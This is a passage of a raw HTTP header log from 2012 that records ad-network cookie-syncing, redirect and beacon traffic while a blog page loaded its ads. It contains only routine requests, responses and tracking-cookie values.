acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:46 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:46 GMT
GET /cw_match HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
Date: Sun, 18 Nov 2012 01:30:46 GMT
Transfer-Encoding: chunked
Connection: close
Set-Cookie: uid=arsYzhphb2F9Y9jhvoZanh%3D%3D; path=/; expires=Mon, 18 Nov 2013 01:30:46 GMT; domain=.simpli.fi
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=537085&amp;ev=CE18BB6A616F611AE1D8637D9E5A86BE
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /pull_sync?pid=contextweb HTTP/1.1

Host: www.wtp101.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Set-Cookie: tuuid=c85b91d8-7a9c-4a22-b1a8-e4968e393975; path=/; expires=Tue, 18-Nov-2014 01:30:46 GMT; domain=.wtp101.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: /pull_sync?ul_cb=1&amp;pid=contextweb
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:46 GMT
GET /iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1916686269%26anmember%3D514%26anprice%3D50%26r%3D0%26s%3D653070,92f3c750-311f-11e2-a7f3-ebbbc404545f,1353202245373 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing; BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0480.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:46 GMT
Expires: Sun, 18 Nov 2012 01:30:46 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /pull_sync?ul_cb=1&pid=contextweb HTTP/1.1

Host: www.wtp101.com
GET /pull_sync?ul_cb=1&amp;pid=contextweb HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: tuuid=c85b91d8-7a9c-4a22-b1a8-e4968e393975
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
Set-Cookie: tuuid=c85b91d8-7a9c-4a22-b1a8-e4968e393975; path=/; expires=Tue, 18-Nov-2014 01:30:46 GMT; domain=.wtp101.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=537583&amp;ev=c85b91d8-7a9c-4a22-b1a8-e4968e393975
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:46 GMT
GET /wrapper/aceUAC.js HTTP/1.1

Host: uac.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1916686269%26anmember%3D514%26anprice%3D50%26r%3D0%26s%3D653070,92f3c750-311f-11e2-a7f3-ebbbc404545f,1353202245373
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cteonnt-Length: 18946
Cache-Control: max-age=3600
Expires: Sun, 18 Nov 2012 01:53:46 GMT
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;
Content-Encoding: gzip
Content-Length: 6031
Vary: Accept-Encoding
Date: Sun, 18 Nov 2012 01:30:46 GMT
Connection: keep-alive
GET /do-association?ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association?ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: id=4612108592868098223; path=/; domain=.mookie1.com; expires=Fri, 13-Dec-2013 01:30:46 GMT mdata=1|4612108592868098223|1353202246; path=/; domain=.mookie1.com; expires=Fri, 13-Dec-2013 01:30:46 GMT
Location: /do-association-set?ctxweb&amp;can=10
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Content-Length: 0
Keep-Alive: timeout=1, max=451
Connection: Keep-Alive
GET /bh/rtset?do=add&pid=537085&ev=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=537085&amp;ev=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-119-224
Date: Sun, 18 Nov 2012 01:30:45 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:46 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085.CE18BB6A616F611AE1D8637D9E5A86BE.0.0.1353202246487|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:46 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /beacon?viewId=135320224335022b7e1619fcd&rand=1353202243350&uri=http://www.lijit.com/users/bloguin/1&informer=6280786&type=fpads&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&ifr=1&v=1.0&rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: gslbeacon.lijit.com
GET /beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.0 200 OK

Content-Type: text/html
Server: Lijit Blackbird 0.0.2
Connection: close
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 1008
Set-Cookie: tpro=eJxNkEGOwyAMRe%2FiNapICG0m12h3oxFCxEmQAkSQjjSqcvcxrlp192z%2B%2FzZ%2BQPE7Fhi%2BH0wwwHVLeS8gwO4wNEqrVrZtdz5%2BBKR9wQzDA0IajUv3WBUCwu4DfmoF%2FGIuPkWKg0NAxglz9nG%2Bos1uuWEOdSQlbjlNfsWa6aNLgamR0mzrnSTy1F4EnKWhFle9ACXNWb6epFHMTU9j7Mx2pU33VZtKgP5I0uQ1TVtZEjdUXNhL3BvVsYViXFpXfEbN2Y6muIVl%2BuNJnjoBMcUn6upa%2FDpmjNX2hzyxa6umkq7rzRjH5%2FkmDHZlK2W%2BsR7KOp7r7N3VXv%2B%2BOe1Mey6%2BbMx0Ylu8ja%2FP2CkbG7jqj%2BP4B8mwhRc%3D%00%00;Expires=Mon, 18-Nov-13 01:30:46 GMT;Domain=localhost tpro_inst=44cd4cfcc8df88c61afacf5f107338e;Expires=Mon, 18-Nov-13 01:30:46 GMT;Domain=localhost
GET /www/delivery/lg.php?bannerid=1550&campaignid=232&cids=232&bids=1550&zoneid=95032&tid=95032_13532022430215598551eed27&channel_ids=,&loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&cb=25f2bdac13 HTTP/1.1

Host: vap4iad3.lijit.com
GET /www/delivery/lg.php?bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550&amp;zoneid=95032&amp;tid=95032_13532022430215598551eed27&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=25f2bdac13 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
GET /RealMedia/ads/adstream_sx.ads/bloguin/ros/300x250/sx/ss/a@x15 HTTP/1.1

Host: network.realmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D420036788%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D1651067,92efcc18-311f-11e2-a19f-73f8a8b88e6f,1353202245347
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=w5+M3lCoOkYAB9bE; path=/; expires=Tue, 18-Nov-14 01:30:46 GMT; domain=.realmedia.com RMFD=011TZtigO101GLK; path=/; expires=Tue, 18-Nov-14 01:30:46 GMT; domain=.realmedia.com NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Sun, 18-Nov-2012 01:31:46 GMT;path=/;httponly
P3P: CP=&quot;NON NID PSAa PSDa OUR IND UNI COM NAV STA&quot;,policyref=&quot;/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Cache-Control: no-cache,no-store,private
Content-Length: 1774
Keep-Alive: timeout=60
Connection: Keep-Alive
GET /bh/rtset?do=add&pid=537583&ev=c85b91d8-7a9c-4a22-b1a8-e4968e393975 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=537583&amp;ev=c85b91d8-7a9c-4a22-b1a8-e4968e393975 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-119-224
Date: Sun, 18 Nov 2012 01:30:45 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:46 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:46 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /getuid?http://ce.lijit.com/merge?pid=12&3pid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://ce.lijit.com/merge?pid=12&amp;3pid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; sess=1; icu=ChII64YEEAoYAiACKAIwxPSghQUQxPSghQUYAQ..; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb508244=![nC'208WMELHn6E/qX3N6)[-?enc=09LS0tLS8j8AAAAAAADwPwAAAAAAAPA_Hxj2ajYF8z9D_plBfGD2P90kqW0UMh5UoArzhH1cTlFEOqhQAAAAAK-WCAACAgAANQEAAAIAAACdkRIA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAArkwBAgUCAQUAAAAAASAjZgAAAAA.&amp;tt_code=1651067&amp;cnd=%21_CJ5AAiKeRCdo0oYACDnsQUwADiHuAFAAEi1AlCvrSJYAGDYBmgAcAB4AIABvgqIAegCkAEBmAEBoAEBqAEDsAEAuQFRTJOAfGD2P8EBUUyTgHxg9j_JARe7GVb71f0_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+3338%2C+1353202244%29%3Buf%28%27r%27%2C+1216925%2C+1353202244%29%3Bppv%282932%2C+%276061337211807802589%27%2C+1353202244%2C+1354411844%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21ewSJIQiKeRCdo0oY57EFIAA.&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sat, 16-Feb-2013 01:30:46 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Mon, 19-Nov-2012 01:30:46 GMT; domain=.adnxs.com; HttpOnly
Location: http://ce.lijit.com/merge?pid=12&amp;3pid=5858721859426781856
Date: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 0
GET /do-association-set?ctxweb&can=10 HTTP/1.1

Host: matcher-cwb.bidder7.mookie1.com
GET /do-association-set?ctxweb&amp;can=10 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
